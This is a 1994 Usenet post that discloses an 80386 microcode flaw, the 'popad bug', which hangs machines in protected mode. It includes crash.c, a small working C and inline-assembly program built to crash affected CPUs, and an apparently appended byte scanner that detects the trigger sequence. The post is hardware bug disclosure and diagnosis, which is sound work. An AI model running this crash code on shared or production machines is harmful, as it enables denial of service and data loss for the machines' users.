Path: sserve!newshost.anu.edu.au!munnari.oz.au!news.Hawaii.Edu!ames!elroy.jpl.nasa.gov!usc!howland.reston.ans.net!agate!msuinfo!harbinger.cc.monash.edu.au!jacobi.maths.monash.edu.au!billm
From: billm@jacobi.maths.monash.edu.au (WE Metzenthen)
Newsgroups: comp.os.386bsd.development
Subject: Serious 80386 bug
Date: 24 Feb 1994 04:11:30 GMT
Organization: Monash University
Lines: 133
Message-ID: <2kh9di$igb@harbinger.cc.monash.edu.au>
NNTP-Posting-Host: jacobi.maths.monash.edu.au
X-Newsreader: TIN [version 1.2 PL2]

[ Article crossposted from comp.os.linux.development ]
[ Author was WE Metzenthen ]
[ Posted on 24 Feb 1994 04:06:12 GMT ]

Running 'crashme' on my Linux system for a few hours caused my machine
to hang. After a few hours of investigation I found the cause. It is
due to a serious bug in the microcode of some 80386's.

In about July 1989 there was some discussion on the net about the
"popad bug" in 80386 processors. It appeared to affect all 80386's
(dx or sx, Intel or AMD) but no 80486 was found which had the bug.
The bug appeared to be benign in so far as its only bad effect seemed
to be to put incorrect contents into the eax register, and there was
an easy work-around. All of the discussion at that stage seemed to be
concerned with tests done in real mode.

From my experiments, the effects of the bug in protected mode appear
to be far more serious. It causes my machine to hang. I have not yet
been able to discover if the processor is still executing instructions
after encountering the offending code.

I have attached the code which triggers the bug to the end of this
posting. BE AWARE THAT THIS CODE CAN RESULT IN DATA LOSS. It is
probably safest to put the code onto ram disk and run it without any
physical disks mounted. I have run it a number of times with disks
mounted and e2fsck has always been able to do the minor fix-up when I
rebooted.

At this stage I know of no way to overcome this bug.
Unless some magic is found, it appears impossible for the operating
system to guard against it. Fortunately, it appears that the
probability of accidentally triggering the bug is very low. However,
any 80386 machine which has this bug should not allow public access
where users can run their own code.

In response to a related posting yesterday to a hardware group, one
user reports that the popad bug exists on an 80386-40, another reports
an 80386sx which doesn't have it.

Art Boyne <boyne@lvld.hp.com> writes that later versions of the 80386
have the popad bug fixed:

> Yes. It is fixed in (at least) the double-sigma step, which I believe
> is still the current 386 stepping. These chips are identified by two
> sigma signs on the package.

It may be helpful if owners of 80386 machines who run the program at
the end of this posting, AFTER TAKING SUITABLE PRECAUTIONS, would mail
the results to me, including the age of the 80386 (or post to
comp.os.linux.development). Thanks.

(My machine uses a 33MHz AMD 80386. The motherboard was manufactured
in Jan 1992.)

--Bill

--------------------------- start of crash.c ------------------------------
/* crash.c

   A small program to crash 80386 machines.

   ***************************** NOTE ****************************
   DO NOT RUN THIS PROGRAM UNLESS YOU ARE WILLING TO ACCEPT
   POSSIBLE DATA LOSS!

   W. Metzenthen  23rd Feb 1994.
   <billm@jacobi.maths.monash.edu.au>

   This code relies upon a defect in the 80386 microcode, i.e. the
   so-called "popad bug".

   A few experiments have been tried. Three components appear to be
   needed:
     1) an operand-size prefix byte,
     2) a 'popa' instruction, and
     3) a critical instruction immediately after the popa. This may be
        'xchgb %al,(%eax)' or similar.

   This code cannot be debugged with gdb, etc; the bug will go away if
   an attempt is made to single-step it.

   None of the following instructions are suitable for use as 3) above
   (they won't crash the machine):
       nop
       movl _x,%eax
       xchgb %al,%ah
       xchgb %al,_x
       xchgb %al,(0)
   but this is:
       xchgb %al,0xfffffff6(%eax,8)

 */

main()
{

  /* Put a valid address into eax, (but not needed). */
  asm volatile ("movl %esp,%eax");

  /* This is the code which does the damage: */
  asm volatile ("
	.byte 0x66
	popa
	xchgb %al,(%eax)
	");

#define TRY_RECOVERY
#ifdef TRY_RECOVERY
  /* Possible recovery if the processor has been put into real mode
     (but doesn't work on my machine): */
  asm volatile ("nop; nop; nop; nop; nop; nop
	/* If in real mode, a far jump to f000:fff0 should cause a re-boot: */
	.byte 0xea, 0xf0, 0xff, 0x00, 0xf0
	");
#endif /* TRY_RECOVERY */

  exit(0);   /* Just in case the above code doesn't crash the machine */
}
---------------------------- end of crash.c -------------------------------

--
Bill Metzenthen
Mathematics Department
Monash University
Clayton, Victoria, Australia

email:  billm@vaxc.cc.monash.edu.au
        billm@euler.maths.monash.edu.au
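
For anyone who would rather look for the trigger sequence in a binary
than run crash.c, here is a rough sketch of a byte scanner. It only
looks for the first two components listed in the crash.c comment (the
operand-size prefix byte 0x66 followed by the popa opcode 0x61) with at
least one more byte after them. The function name find_prefixed_popa
is made up for this illustration and is not part of crash.c. It does
not decode instructions, so it may match bytes that are really data or
the middle of another instruction, and it makes no attempt to decide
whether the instruction that follows is a "critical" one.

```c
#include <stddef.h>

/* Opcode bytes from the 80386 instruction set:
   0x66 is the operand-size prefix, 0x61 is popa/popad. */
#define OPSIZE_PREFIX 0x66
#define POPA_OPCODE   0x61

/* Hypothetical helper (an assumption for illustration, not from crash.c):
   return the offset of the first 0x66 0x61 pair that is followed by at
   least one more byte, or -1 if no such pair is found.  This is a plain
   byte scan; it does not track instruction boundaries. */
long find_prefixed_popa(const unsigned char *code, size_t len)
{
    size_t i;

    /* i + 2 < len guarantees that a byte exists after the popa opcode. */
    for (i = 0; i + 2 < len; i++) {
        if (code[i] == OPSIZE_PREFIX && code[i + 1] == POPA_OPCODE)
            return (long)i;
    }
    return -1;
}
```

As a usage example, the instructions in crash.c would typically
assemble to the bytes 89 e0 (movl %esp,%eax), 66 61 (prefixed popa)
and 86 00 (xchgb %al,(%eax)); calling find_prefixed_popa() on that
six-byte buffer returns offset 2. A scan like this can only flag
suspicious code. It does nothing to stop a program from building the
same bytes at run time.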